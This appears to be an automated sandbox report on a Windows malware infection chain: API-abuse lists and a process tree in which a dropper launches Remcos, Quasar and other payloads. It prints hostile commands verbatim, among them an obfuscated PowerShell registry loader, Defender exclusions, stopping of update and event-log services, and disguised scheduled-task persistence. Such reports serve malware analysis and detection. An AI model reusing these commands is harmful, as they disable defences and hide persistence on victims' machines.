Token: SeDebugPrivilege	2452	ogpayload.exe
Token: SeDebugPrivilege	2124	comctl32.exe
Token: SeDebugPrivilege	2396	comctl32.exe
Token: SeDebugPrivilege	2920	Servers.exe
Token: SeDebugPrivilege	1772	Loader.exe
Token: SeDebugPrivilege	2272	Windows Defender SmartScreen (32 bit).exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	1576	comctl32.exe
Token: SeDebugPrivilege	1772	Loader.exe
Token: SeDebugPrivilege	1076	comctl32.exe
Token: SeDebugPrivilege	796	powershell.EXE
Token: SeDebugPrivilege	796	powershell.EXE
Token: SeDebugPrivilege	1268	dllhost.exe
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
108	fuck.exe
1476	remcos_a2.exe
1504	EXCEL.EXE
1280	Client-base.exe
2124	comctl32.exe
2396	comctl32.exe
2272	Windows Defender SmartScreen (32 bit).exe
1576	comctl32.exe
1076	comctl32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2916 wrote to memory of 2228	2916	New Text Document mod.exe	28
PID 2916 wrote to memory of 2228	2916	New Text Document mod.exe	28
PID 2916 wrote to memory of 2228	2916	New Text Document mod.exe	28
PID 2916 wrote to memory of 2228	2916	New Text Document mod.exe	28
PID 2916 wrote to memory of 1984	2916	New Text Document mod.exe	30
PID 2916 wrote to memory of 1984	2916	New Text Document mod.exe	30
PID 2916 wrote to memory of 1984	2916	New Text Document mod.exe	30
PID 2916 wrote to memory of 1984	2916	New Text Document mod.exe	30
PID 1984 wrote to memory of 2232	1984	Synaptics.exe	31
PID 1984 wrote to memory of 2232	1984	Synaptics.exe	31
PID 1984 wrote to memory of 2232	1984	Synaptics.exe	31
PID 1984 wrote to memory of 2232	1984	Synaptics.exe	31
PID 2232 wrote to memory of 2580	2232	._cache_Synaptics.exe	33
PID 2232 wrote to memory of 2580	2232	._cache_Synaptics.exe	33
PID 2232 wrote to memory of 2580	2232	._cache_Synaptics.exe	33
PID 2232 wrote to memory of 2580	2232	._cache_Synaptics.exe	33
PID 2228 wrote to memory of 2476	2228	._cache_New Text Document mod.exe	35
PID 2228 wrote to memory of 2476	2228	._cache_New Text Document mod.exe	35
PID 2228 wrote to memory of 2476	2228	._cache_New Text Document mod.exe	35
PID 2228 wrote to memory of 2476	2228	._cache_New Text Document mod.exe	35
PID 2228 wrote to memory of 2476	2228	._cache_New Text Document mod.exe	35
PID 2228 wrote to memory of 2476	2228	._cache_New Text Document mod.exe	35
PID 2228 wrote to memory of 2476	2228	._cache_New Text Document mod.exe	35
PID 2232 wrote to memory of 1636	2232	._cache_Synaptics.exe	37
PID 2232 wrote to memory of 1636	2232	._cache_Synaptics.exe	37
PID 2232 wrote to memory of 1636	2232	._cache_Synaptics.exe	37
PID 2228 wrote to memory of 1968	2228	._cache_New Text Document mod.exe	38
PID 2228 wrote to memory of 1968	2228	._cache_New Text Document mod.exe	38
PID 2228 wrote to memory of 1968	2228	._cache_New Text Document mod.exe	38
PID 2228 wrote to memory of 1968	2228	._cache_New Text Document mod.exe	38
PID 2232 wrote to memory of 108	2232	._cache_Synaptics.exe	39
PID 2232 wrote to memory of 108	2232	._cache_Synaptics.exe	39
PID 2232 wrote to memory of 108	2232	._cache_Synaptics.exe	39
PID 2232 wrote to memory of 108	2232	._cache_Synaptics.exe	39
PID 2228 wrote to memory of 1476	2228	._cache_New Text Document mod.exe	40
PID 2228 wrote to memory of 1476	2228	._cache_New Text Document mod.exe	40
PID 2228 wrote to memory of 1476	2228	._cache_New Text Document mod.exe	40
PID 2228 wrote to memory of 1476	2228	._cache_New Text Document mod.exe	40
PID 2476 wrote to memory of 1028	2476	Updater.exe	43
PID 2476 wrote to memory of 1028	2476	Updater.exe	43
PID 2476 wrote to memory of 1028	2476	Updater.exe	43
PID 2476 wrote to memory of 1028	2476	Updater.exe	43
PID 2580 wrote to memory of 2204	2580	NewApp.exe	45
PID 2580 wrote to memory of 2204	2580	NewApp.exe	45
PID 2580 wrote to memory of 2204	2580	NewApp.exe	45
PID 2580 wrote to memory of 2204	2580	NewApp.exe	45
PID 1904 wrote to memory of 2748	1904	cmd.exe	55
PID 1904 wrote to memory of 2748	1904	cmd.exe	55
PID 1904 wrote to memory of 2748	1904	cmd.exe	55
PID 2768 wrote to memory of 2616	2768	cmd.exe	87
PID 2768 wrote to memory of 2616	2768	cmd.exe	87
PID 2768 wrote to memory of 2616	2768	cmd.exe	87
PID 2836 wrote to memory of 1672	2836	Updater.exe	101
PID 2836 wrote to memory of 1672	2836	Updater.exe	101
PID 2836 wrote to memory of 1672	2836	Updater.exe	101
PID 2836 wrote to memory of 1672	2836	Updater.exe	101
PID 2836 wrote to memory of 1672	2836	Updater.exe	101
PID 2836 wrote to memory of 1672	2836	Updater.exe	101
PID 2836 wrote to memory of 1672	2836	Updater.exe	101
PID 2836 wrote to memory of 1672	2836	Updater.exe	101
PID 2836 wrote to memory of 1672	2836	Updater.exe	101
PID 2836 wrote to memory of 828	2836	Updater.exe	106
PID 2836 wrote to memory of 828	2836	Updater.exe	106
PID 2836 wrote to memory of 828	2836	Updater.exe	106

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:428
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8538fc81-4864-4331-adcb-b13e7457bba4}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1268

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:472
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:592
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1048
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -Embedding
    3⤵
    PID:840
- - C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    3⤵
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    PID:1504
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    PID:832
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:668
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  PID:732
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:804
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1160
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  PID:844
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {8B3475C9-0643-44EB-9C3B-30681576F9C5} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    PID:1896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+'TWA'+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](76)+''+[Char](77)+''+[Char](88)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      PID:796
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:960
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:236
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:344
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1068
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1116
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2076
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:1840
- C:\ProgramData\GoogleUP\Chrome\Updater.exe
  C:\ProgramData\GoogleUP\Chrome\Updater.exe
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:2616
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2688
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2700
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2600
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:1896
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:1516
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1108
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:276
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1740
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1684
- - C:\Windows\system32\conhost.exe
    C:\Windows\system32\conhost.exe
    3⤵
    PID:1672
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:828

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:488

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:496

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1196
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  - Loads dropped DLL
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2228
  - - C:\Users\Admin\AppData\Local\Temp\a\Updater.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Updater.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2476
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Fasyer', 'C:\Users'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1028
  - - C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe
      "C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1968
    - - C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe"
        5⤵
        Executes dropped EXE
        
        PID:692
  - - C:\Users\Admin\AppData\Local\Temp\a\remcos_a2.exe
      "C:\Users\Admin\AppData\Local\Temp\a\remcos_a2.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1932
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 1160
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:1948
  - - C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2648
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 1168
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:1740
  - - C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2452
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe" /rl HIGHEST /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2748
    - - C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2124
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2996
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\gcqKihuYfvij.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2072
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1692
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3064
        
        C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2396
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:864
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\jLJvAYyQnAlQ.bat" "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1304
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:800
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1356
        
        C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1576
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
        10⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1800
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\elZ1MCgHu2iD.bat" "
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2488
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:3032
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2788
        
        C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1076
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
        12⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2360
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\j5McJZwHvKNz.bat" "
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:748
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:2428
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1588
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 1444
        12⤵
        Loads dropped DLL
        Program crash
        
        PID:2608
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 1444
        10⤵
        Loads dropped DLL
        Program crash
        
        PID:1652
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 1428
        8⤵
        Loads dropped DLL
        Program crash
        
        PID:1276
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1452
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:3032
  - - C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1280
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2508
  - - C:\Users\Admin\AppData\Local\Temp\a\Servers.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2920
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2556
    - - C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe
        
        "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2272
      - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2884
  - - C:\Users\Admin\AppData\Local\Temp\a\mac.exe
      "C:\Users\Admin\AppData\Local\Temp\a\mac.exe"
      4⤵
      Executes dropped EXE
      PID:620
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 620 -s 536
        5⤵
        
        PID:748
  - - C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1772
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2160
  - - C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2456
  - - C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1696
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2232
    - - C:\Users\Admin\AppData\Local\Temp\a\NewApp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\NewApp.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2580
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Fasyer', 'C:\Users', 'C:\ProgramData'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2204
    - - C:\Users\Admin\AppData\Local\Temp\a\yuksefyj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\yuksefyj.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:1636
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1332
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1904
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        Drops file in Windows directory
        
        PID:2748
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:2568
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:1532
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:940
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:1716
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:1768
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:316
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3032
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2560
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
        6⤵
        Launches sc.exe
        
        PID:1692
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:2324
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:1708
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
        6⤵
        Launches sc.exe
        
        PID:1028
    - - C:\Users\Admin\AppData\Local\Temp\a\fuck.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\fuck.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:108
    - - C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"
        5⤵
        Executes dropped EXE
        Maps connected drives based on registry
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Enumerates system info in registry
        
        PID:872
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1320
      - C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS /CREATE /TN "System-cb832607b4" /TR "C:\Windows\System32\System-cb832607b4.exe" /SC ONLOGON /RL HIGHEST /F
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1088
      - C:\Windows\System32\svchost.exe
        
        C:\Windows\System32\svchost.exe
        6⤵
        
        PID:2204
      - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\SysWOW64\explorer.exe"
        6⤵
